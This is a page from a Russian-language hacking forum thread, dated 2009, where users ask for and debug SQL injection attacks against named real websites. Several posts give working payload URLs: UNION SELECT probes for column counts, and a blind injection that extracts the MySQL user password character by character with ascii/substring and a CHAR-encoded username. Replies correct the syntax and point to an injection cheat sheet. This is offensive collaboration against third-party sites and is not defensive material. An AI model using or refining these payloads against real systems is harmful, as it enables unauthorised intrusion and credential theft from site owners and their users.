Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
  1. Kakoytoxaker

    Kakoytoxaker Elder - Старейшина

    Joined:
    18 Feb 2008
    Messages:
    1,038
    Likes Received:
    1,139
    Reputations:
    350
    Octave_Parango
    Чем помочь? Погадать? На картах или на кофейной гуще предпочитаете?

    Запрос верен, если запись не одна, должно выводить, остальное домыслы и без линка не уместны
     
    2 people like this.
  2. Octave_Parango

    Joined:
    6 Nov 2008
    Messages:
    83
    Likes Received:
    11
    Reputations:
    -1
    jokester,
    Ок. спасибо!
     
  3. x311

    x311 New Member

    Joined:
    23 Jan 2009
    Messages:
    4
    Likes Received:
    0
    Reputations:
    -1
    x311

    http://www.motion-twin.com/blog/month?m=10001'

    ну бага ведь в месяце ....
     
  4. Gorev

    Gorev Level 8

    Joined:
    31 Mar 2006
    Messages:
    2,551
    Likes Received:
    1,259
    Reputations:
    274
    вопрос таков, есть сайтег скуля есть но слепая верся БД 4, есть форум ипб кто нибудь может дать название табелок и колонок в бд для форума?
     
  5. DimOnOID

    DimOnOID Banned

    Joined:
    5 Dec 2006
    Messages:
    407
    Likes Received:
    126
    Reputations:
    4
    http://up.cih.ms/ettee/sql/
    помогает)
     
  6. Gorev

    Gorev Level 8

    Joined:
    31 Mar 2006
    Messages:
    2,551
    Likes Received:
    1,259
    Reputations:
    274
    spasibo
     
  7. TELO

    TELO Member

    Joined:
    21 Jan 2009
    Messages:
    68
    Likes Received:
    44
    Reputations:
    6
    sabe
    Code:
    http://photo.gala.net/index.php?action=view&id=-120141026+union+select+222+--+
    1 колонка


    не пойму, ну выводит 222,а как узнать версию?
     
  8. R1dex

    R1dex Elder - Старейшина

    Joined:
    17 Sep 2008
    Messages:
    255
    Likes Received:
    132
    Reputations:
    19
    Это не вывод...

    Code:
    http://photo.gala.net/index.php?action=view&id=120141026+union+select+111111111111111--
    Похоже, там 11 колонок, но вывода нету.

    Насчёт подзапросов...
    Всего пару раз встречался с Sybase ASE, поэтому не знаю, работают они там или нет..
    Вроде нет.

    Хотя.. сейчас может придёт дядя jokester и отругает меня за то, что я снова тороплюсь ^^
     
    #5128 R1dex, 30 Jan 2009
    Last edited: 30 Jan 2009
  9. kevmen

    kevmen Member

    Joined:
    29 Oct 2008
    Messages:
    147
    Likes Received:
    23
    Reputations:
    0
    Здравствуйте)
    Помогите найти ошибку,пожалуйста! :)

    PHP:
    http://www.tehbasa.ru/index.php?idt=25
    +and+ascii(lower(substring(select+password
    +from+mysql.user+where
    +user=char(116,101,104,98,97,115,97,95,97,
    115,105,100,64,55,57,46,49,55,52,46,55,51,46,55,50)+limit+1),1,1)))%3C=122
     
  10. Gorev

    Gorev Level 8

    Joined:
    31 Mar 2006
    Messages:
    2,551
    Likes Received:
    1,259
    Reputations:
    274
    http://www.tehbasa.ru/index.php?idt=25+and+ascii(lower(substring(select+password+from+mysql.user+where+user=char(116,101,104,98,97,115,97,95,97,115,105,100,64,55,57,46,49,55,52,46,55,51,46,55,50)+limit+1,1),1,1)))%3C=122
    либо
    http://www.tehbasa.ru/index.php?idt=25+and+ascii(lower(substring(select+password+from+mysql.user+where+user=char(116,101,104,98,97,115,97,95,97,115,105,100,64,55,57,46,49,55,52,46,55,51,46,55,50)+limit+1,1)))%3C=122
     
  11. Pashkela

    Pashkela Динозавр

    Joined:
    10 Jan 2008
    Messages:
    2,750
    Likes Received:
    1,044
    Reputations:
    339
    даже не глядя - +limit+1 = бред. Как минимум limit+0,1

    и что такое "%3C="???

    просто "=" уже не модно?
     
  12. kevmen

    kevmen Member

    Joined:
    29 Oct 2008
    Messages:
    147
    Likes Received:
    23
    Reputations:
    0
    %3C=
    Это <=

    Причем тут модно не модно!я проверяю существует ли вообще:)
     
  13. kevmen

    kevmen Member

    Joined:
    29 Oct 2008
    Messages:
    147
    Likes Received:
    23
    Reputations:
    0
    если ты убераешь 1,1 с чем тогда сравнивать?
     
    1 person likes this.
  14. R1dex

    R1dex Elder - Старейшина

    Joined:
    17 Sep 2008
    Messages:
    255
    Likes Received:
    132
    Reputations:
    19
    Перед select нехватает одной скобки..

    А вообще, там нету mysql.user )
     
    #5134 R1dex, 30 Jan 2009
    Last edited: 30 Jan 2009
    1 person likes this.
  15. Dimi4

    Dimi4 Чайный пакетик

    Joined:
    19 Mar 2007
    Messages:
    750
    Likes Received:
    1,046
    Reputations:
    291
    А не проще
    ?
     
    4 people like this.
  16. kevmen

    kevmen Member

    Joined:
    29 Oct 2008
    Messages:
    147
    Likes Received:
    23
    Reputations:
    0
    так я хочу вывести пароль!Название базы то есть,оно закодировано в чар
     
  17. R1dex

    R1dex Elder - Старейшина

    Joined:
    17 Sep 2008
    Messages:
    255
    Likes Received:
    132
    Reputations:
    19
    Мне кажется, его интересовали именно подзапросы...
    Хотя мб и нет..
     
  18. kevmen

    kevmen Member

    Joined:
    29 Oct 2008
    Messages:
    147
    Likes Received:
    23
    Reputations:
    0
    угу :) для 4 ветки это полезно изучить!да и понадобится,когда вывод ошибок отключен!
     
  19. x311

    x311 New Member

    Joined:
    23 Jan 2009
    Messages:
    4
    Likes Received:
    0
    Reputations:
    -1
    http://trophymanager.com/klubhus.php?showclub=1'
    нужна ренистпация, поля не смог подобрать .
     
  20. DimOnOID

    DimOnOID Banned

    Joined:
    5 Dec 2006
    Messages:
    407
    Likes Received:
    126
    Reputations:
    4
    ну акк бы дал..нахер кому надо регатца там
     
Thread Status:
Not open for further replies.